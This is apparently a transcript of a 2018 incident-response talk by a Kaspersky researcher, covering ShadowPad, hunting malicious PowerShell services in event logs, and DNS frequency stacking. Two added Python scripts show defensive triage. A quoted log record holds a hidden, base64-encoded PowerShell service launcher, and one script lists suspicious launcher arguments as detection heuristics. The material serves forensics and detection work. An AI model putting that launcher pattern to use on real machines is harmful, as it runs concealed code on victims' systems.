Sergey Golovanov - Indecent Response 2018
DC7499
February 10, 2018
Education
Transcript
Indecent Response 2018. Sergey @k1k_ Golovanov, Principal Security Researcher, Kaspersky Lab
Challenge: find an SDC bus speed
Agenda
1. Shadowpad
2. 0x403AA91EE
3. Scanner2
4. Plans
1. Shadowpad
Case overview:
1. The bank's antifraud system detects that a large number of elite cards have been printed over the last several hours.
2. The bank starts a network audit.
3. The bank discovers suspicious DNS requests.
4. Forensics cannot find malware on the PCs.
5. The bank asks for help…
DNS requests
"Our worldwide customers range from small businesses right up to global Fortune 500 companies." (NetSarang)
NetSarang clients listed: American Express, Bank of America Corp., Bank of China, BNP Paribas, Citigroup, Deutsche Bank, Fortis, General Electric, ING Group, Merrill Lynch, Morgan Stanley, Shinhan Financial Group, Societe Generale, UBS
https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsarang.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru
https://securelist.com/shadowpad-in-corporate-networks/81432/
What was done?
AutoMA – static analysis framework
Shadowpad after autoMA
Miniduke after autoMA
2. 0x403AA91EE
Case overview:
How to find suspicious DNS requests? sort | uniq -c | sort -rn
How to find suspicious PowerShell? sort | uniq -c | sort -rn
parse_evtx.exe System.evtx | findstr /i "power" | more
Record #2396788 2027.02.22-08:03:00 'Computer':'PC1', 'Channel':'System', 'EventSourceName':'Service Control Manager', 'Guid':'GUID', 'Name':'Service Control Manager', 'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04, 'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the system.), 'Qualifiers':16384, 'Keywords':8080000000000000, 'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692, 'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID, 'ServiceName':'1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
https://github.com/KasperskyLab/ForensicsTools/
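The 7045 record above is the whole finding in miniature: a service with a random-looking name whose ImagePath is a hidden PowerShell launcher with a base64 blob. Below is an added triage script for that pattern; it is not code from the talk and not part of KasperskyLab/ForensicsTools. It assumes the one-record-per-line 'Key':'value' text layout that the slide shows parse_evtx.exe emitting, the sample records are constructed in that layout (the first reuses the ServiceName and the encoded blob from the slide, cut off where the slide cuts it off; the second is a benign control), and the "suspicious argument" and "random service name" checks are heuristics chosen for the example, not signatures. -EncodedCommand carries UTF-16LE text, which is why the decoder does not simply base64-decode to ASCII.

```python
"""Triage Service Control Manager event 7045 ("A service was installed")
for PowerShell launched with -EncodedCommand, and decode the command.

Added example; the parse_evtx.exe text layout is assumed from one slide.
"""
import base64
import re

# Constructed sample records in the assumed parse_evtx.exe layout.
SAMPLE_RECORDS = [
    "Record #2396788 2027.02.22-08:03:00 'Computer':'PC1', 'Channel':'System', "
    "'EventSourceName':'Service Control Manager', 'EventID':7045 (A service was "
    "installed in the system.), 'SystemTime':2027.02.22-08:03:00, "
    "'ServiceName':'1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min "
    "powershell.exe -nop -w hidden -encodedcommand "
    "JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA'",
    # Benign control record, added for contrast.
    "Record #2396790 2027.02.22-08:05:11 'Computer':'PC1', 'Channel':'System', "
    "'EventSourceName':'Service Control Manager', 'EventID':7045 (A service was "
    "installed in the system.), 'SystemTime':2027.02.22-08:05:11, "
    "'ServiceName':'Spooler', 'ImagePath':'C:\\Windows\\System32\\spoolsv.exe'",
]

FIELD_RE = {
    "EventID": re.compile(r"'EventID':(\d+)"),
    "SystemTime": re.compile(r"'SystemTime':([^,]+)"),
    "ServiceName": re.compile(r"'ServiceName':'([^']*)'"),
    "ImagePath": re.compile(r"'ImagePath':'([^']*)'"),
}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENCODED_RE = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)

# Launcher traits worth flagging on their own (heuristic, not a signature).
SUSPICIOUS_ARGS = ("-nop", "-noni", "-w hidden", "-windowstyle hidden", "%comspec%")
# Short hex service names like '1aec4f0' are not how products name services.
RANDOM_NAME_RE = re.compile(r"^[0-9a-f]{6,8}$")


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 of UTF-16LE text; tolerate a blob the log cut short."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    if len(raw) % 2:
        raw = raw[:-1]  # drop a dangling half code unit from a truncated blob
    return raw.decode("utf-16-le", errors="replace")


def parse_record(line: str) -> dict:
    """Pull the few fields triage needs out of one text record."""
    rec = {}
    for name, rx in FIELD_RE.items():
        m = rx.search(line)
        rec[name] = m.group(1) if m else None
    return rec


def triage_7045(lines):
    """Return one finding per 7045 record whose ImagePath launches PowerShell."""
    findings = []
    for line in lines:
        rec = parse_record(line)
        if rec["EventID"] != "7045" or not rec["ImagePath"]:
            continue
        path = rec["ImagePath"]
        low = path.lower()
        if "powershell" not in low:
            continue
        flags = [a for a in SUSPICIOUS_ARGS if a in low]
        if rec["ServiceName"] and RANDOM_NAME_RE.match(rec["ServiceName"].lower()):
            flags.append("random-looking service name")
        m = ENCODED_RE.search(path)
        findings.append({
            "time": rec["SystemTime"],
            "service": rec["ServiceName"],
            "image_path": path,
            "flags": flags,
            "decoded": decode_encoded_command(m.group(1)) if m else None,
        })
    return findings


if __name__ == "__main__":
    for f in triage_7045(SAMPLE_RECORDS):
        print(f["time"], f["service"], f["flags"])
        print("  decoded:", f["decoded"])
```

On the slide's blob the decoder yields "$s=New-Object IO.MemoryStream(", the opening of an in-memory loader; the rest is what the slide cut off, so on a real log you would take the full ImagePath and the decode gives you the whole stager to read. The benign Spooler record is skipped because its ImagePath never mentions PowerShell, which is the cheap first filter the findstr on the slide also applies.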
3. Scanner2
Case overview:
1. No money
2. No logs
3. No team
4. No idea about the network
5. CISO!
What to do? We need logs. We need MFTs. We need registry hives.
WE NEED TO RECOMPILE EVERYTHING!
Awesome batch file
How to find something suspicious? sort | uniq -c | sort -rn
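The same three-command stack appears on the DNS slide in section 2 and on this slide, so one added example covers both: least-frequency stacking in Python rather than in the shell, plus the one twist a DNS stack needs. This is not code from the talk; the "date time client qname" log layout is an assumption and the query lines are constructed for the example. The twist is that a beacon or tunnel that uses a fresh subdomain for every query never repeats a name, so each query lands in the tail on its own and the plain stack shows nothing unusual per name; grouping by parent domain and comparing distinct names to total queries brings that shape back out.

```python
"""Least-frequency stacking: sort | uniq -c | sort -rn, and the per-domain
fan-out view that a plain stack of DNS names misses.

Added example; log layout assumed, sample lines constructed.
"""
from collections import Counter

# Constructed query log, one query per line: date time client qname.
SAMPLE_DNS = """\
2018-02-09 09:00:01 10.0.1.15 wpad.corp.example
2018-02-09 09:00:02 10.0.1.15 dc01.corp.example
2018-02-09 09:00:05 10.0.1.22 wpad.corp.example
2018-02-09 09:00:07 10.0.1.22 mail.corp.example
2018-02-09 09:00:09 10.0.1.31 wpad.corp.example
2018-02-09 09:00:11 10.0.1.31 dc01.corp.example
2018-02-09 09:00:14 10.0.1.15 mail.corp.example
2018-02-09 09:00:20 10.0.1.40 q7k2m.stats-cdn.example
2018-02-09 09:00:21 10.0.1.15 wpad.corp.example
2018-02-09 09:00:25 10.0.1.40 x9p1z.stats-cdn.example
2018-02-09 09:00:30 10.0.1.22 dc01.corp.example
2018-02-09 09:00:31 10.0.1.40 a3r8w.stats-cdn.example
2018-02-09 09:00:35 10.0.1.31 mail.corp.example
2018-02-09 09:00:40 10.0.1.40 n6t4v.stats-cdn.example
"""


def qnames(lines):
    """The queried name is the last whitespace-separated field (assumed layout)."""
    return [ln.split()[-1].lower().rstrip(".") for ln in lines if ln.strip()]


def stack(keys):
    """sort | uniq -c | sort -rn: (key, count) pairs, most common first."""
    return Counter(keys).most_common()


def long_tail(keys, max_count=1):
    """The bottom of the stack: keys seen max_count times or fewer."""
    return [(k, c) for k, c in stack(keys) if c <= max_count]


def registered_domain(qname):
    """Naive parent domain (last two labels); a public-suffix list is the real thing."""
    return ".".join(qname.split(".")[-2:])


def subdomain_fanout(keys):
    """Per parent domain: (domain, distinct names, total queries).

    Sorted so that domains where almost every query is a brand-new name
    come first; a high distinct/total ratio is the beacon or tunnel shape.
    """
    per_domain = {}
    for k in keys:
        per_domain.setdefault(registered_domain(k), []).append(k)
    rows = [(d, len(set(names)), len(names)) for d, names in per_domain.items()]
    return sorted(rows, key=lambda r: (r[1] / r[2], r[1]), reverse=True)


if __name__ == "__main__":
    names = qnames(SAMPLE_DNS.splitlines())
    print("stack (most common first):")
    for name, count in stack(names):
        print(f"{count:7d} {name}")
    print("fan-out by parent domain (distinct/total):")
    for domain, distinct, total in subdomain_fanout(names):
        print(f"{distinct:4d}/{total:<4d} {domain}")
```

Read the stack from the bottom: the corporate names repeat and the four stats-cdn.example names each appear once, which is what the shell pipeline shows too. The fan-out table then puts stats-cdn.example at the top with four distinct names out of four queries, all from one client, which is the line to pull the client for.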
https://cdn.securelist.com/files/2017/12/HappyNewYear.zip
4. Plans
1. The MFT is hell. Sleuthkit is not enough; we need more data about deleted files.
2. The USN journal ($UsnJrnl) is required, read without touching the HDD.
3. Registry analysis is needed over the unallocated part of the hives as well (deleted keys).
Why?
Thank you! Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky Lab